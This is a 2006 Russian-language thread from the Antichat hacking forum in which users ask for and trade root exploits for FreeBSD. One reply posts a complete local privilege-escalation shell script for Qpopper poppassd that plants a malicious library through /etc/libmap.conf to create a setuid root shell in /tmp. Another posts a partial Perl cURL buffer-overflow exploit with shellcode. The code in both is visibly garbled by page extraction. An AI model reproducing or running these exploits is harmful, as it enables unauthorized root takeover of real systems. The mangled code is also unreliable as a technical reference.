ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > *nix
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

У кого есть рут сплойт под фряху?
  #1  
Старый 31.08.2006, 16:40
Аватар для SanyaX
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию У кого есть рут сплойт под фряху?

Вот собственно под эту версию FreeBSD 5.4-RELEASE сплойт нужен. В инете обыскал не где не нашёл. У кого есть поделитесь .
__________________
-=Ok let's Go=-
-=OpenVPN=-
 

  #2  
Старый 31.08.2006, 16:49
Аватар для Dracula4ever
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

вот тебе хорошый сплойт для FreeBSD 5.4-RELEASE

PHP код:
#!/bin/sh
###########################################################################
# FreeBSD Qpopper poppassd latest version local r00t exploit by kcope   ###
# tested on FreeBSD 5.4-RELEASE                                         ###
###########################################################################

POPPASSD_PATH=/usr/local/bin/poppassd
HOOKLIB
=libutil.so.4

echo ""
echo "FreeBSD Qpopper poppassd latest version local r00t exploit by kcope"
echo ""
sleep 2
umask 0000
if [ -/etc/libmap.conf ]; then
echo "OOPS /etc/libmap.conf already exists.. exploit failed!"
exit
fi
cat 
program.<< _EOF
#include <unistd.h>
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>

void _init()
{
 if (!
geteuid()) {
 
remove("/etc/libmap.conf");
 
execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL);
 }
}

_EOF
gcc 
-o program.-c program.-fPIC
gcc 
-shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.-nostartfiles
cp libno_ex
.so.1.0 /tmp/libno_ex.so.1.0
echo "--- Now type ENTER ---"
echo ""
$POPPASSD_PATH -/etc/libmap.conf
echo $HOOKLIB ../../../../../../tmp/libno_ex.so.1.0 > /etc/libmap.conf
su
if [ -/tmp/xxxx ]; then
echo "IT'S A ROOTSHELL!!!"
/tmp/xxxx
else
echo 
"Sorry, exploit failed."
fi 

Последний раз редактировалось dracula4ever; 31.08.2006 в 17:05..
 

  #3  
Старый 31.08.2006, 16:55
Аватар для SanyaX
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию

Не не подходит ошибки выдаёт .
/usr/local/bin/poppassd: not found
cannot create /etc/libmap.conf: Permission denied
__________________
-=Ok let's Go=-
-=OpenVPN=-

Последний раз редактировалось SanyaX; 31.08.2006 в 16:59..
 

  #4  
Старый 31.08.2006, 17:01
Аватар для Dracula4ever
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

SanyaX вот посмотри http://www.milw0rm.com/exploits/1230
 

  #5  
Старый 31.08.2006, 17:27
Аватар для +toxa+
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

ну эт только если Qpopper установлен...
__________________
 

  #6  
Старый 19.09.2006, 05:39
Аватар для [loy]
[loy]
Участник форума
Регистрация: 24.03.2006
Сообщений: 184
Провел на форуме:
344009

Репутация: 72
По умолчанию

А вот мне нужен Сплоед под FreeBSD 6.1
 

  #7  
Старый 19.09.2006, 05:55
Аватар для [hidden]
[hidden]
Участник форума
Регистрация: 05.11.2005
Сообщений: 103
Провел на форуме:
425441

Репутация: 31
По умолчанию

Под шестую ветку есть только парочка DoS-эксплойтов, которые уже не работают
 

  #8  
Старый 19.09.2006, 09:40
Аватар для Dracula4ever
Dracula4ever
Постоянный
Регистрация: 08.05.2006
Сообщений: 559
Провел на форуме:
1593567

Репутация: 354


Отправить сообщение для Dracula4ever с помощью ICQ Отправить сообщение для Dracula4ever с помощью AIM Отправить сообщение для Dracula4ever с помощью Yahoo
По умолчанию

Цитата:
Сообщение от [loy]  
А вот мне нужен Сплоед под FreeBSD 6.1
PHP код:
#!/usr/bin/perl
#
# Remote FreeBSD cURL exploit for versions 6.1 - 7.4
#
# Written by zillion (at http://www.safemode.org && http://www.xsnosoft.com)
#
# This exploit may only be used for testing purposes. More information 
# about the used vulnerability can be found on securityfocus:
#
# http://online.securityfocus.com/bid/1804
#
# The shellcode will write "Ha! Owned by a cURL!" to stdout on the system
# running cURL. The extra nops are needed because the buffer, which causes
# the overflow, is altered.
#
# $ ./curl -s ftp://xxx.xxx.xxx.xxx:21/
# Ha! Owned by a cURL! 

use IO::Socket;
use 
Net::hostent;

########################################################################

$shellcode 
"xebx14x5ex31xc0x6ax14x56x40x40x50xb0x04x50xcd".
"x80x31xc0x40x50xcdx80xe8xe7xffxffxffx48x61x21".
"x20x4fx77x6ex65x64x20x62x79x20x61x20x63x55x52".
"x4cx21x23".

"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90";

while(
$_ $ARGV[0], /^-/) {
shift
last if /^--$/;
/^-
p/ && do { $port shift; };
/^-
l/ && do { $list 1; };
/^-
o/ && do { $offset shift; };
}


$id = `id -u`; chop($id);
$size 225;
$esp 0xbfbffbd4;
$offset = -140 unless $offset;
$port 21 unless $port;

if(!
$list || $port 1024 && $id != 0) {

print 
Option: $-

Note
low ports require root privileges

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-++-+-+-+-+-+-+-+-+-+-+-+-+-+

TWENTE
exit;

}

for (
$i 0$i $port,
Proto => 'tcp',
Listen => 1,
Reuse => 1,
);
die 
"Could not create socket: $!n" unless $sock;

while(
$cl $sock->accept()) {

$hostinfo gethostbyaddr($cl->peeraddr);
printf "[Received connect from %s]n"$cl->peerhost;
print 
$cl "220 Safemode.org FTP server (Version 666) ready.n";
print 
$cl "230 Okn";
print 
$cl "227 $buffern";
sleep 2;


 

  #9  
Старый 19.09.2006, 10:58
Аватар для blackybr
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

dracula4ever читай описание сплоита в шапке.. вроде инглиш же знаешь
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 

  #10  
Старый 19.09.2006, 11:01
Аватар для SanyaX
SanyaX
.::Club Life::.
Регистрация: 28.01.2005
Сообщений: 1,205
Провел на форуме:
7426415

Репутация: 1398


Отправить сообщение для SanyaX с помощью ICQ
По умолчанию

Смешно этот сплойт воще не под рут идёт. Имхо я заметил под фряху воще в паблике сплойтов нету.
__________________
-=Ok let's Go=-
-=OpenVPN=-
 
Закрытая тема



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
У кого нить есть? system error ICQ 27 27.10.2003 04:46
Есть uin есть пароль.... Roman ICQ 4 27.05.2003 17:59
Есть ли прога чтоб узнать по ip на каком сайте чел Болталка 1 31.03.2003 11:32
Есть вопрос на счёт чата Чаты 6 12.09.2002 17:52



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ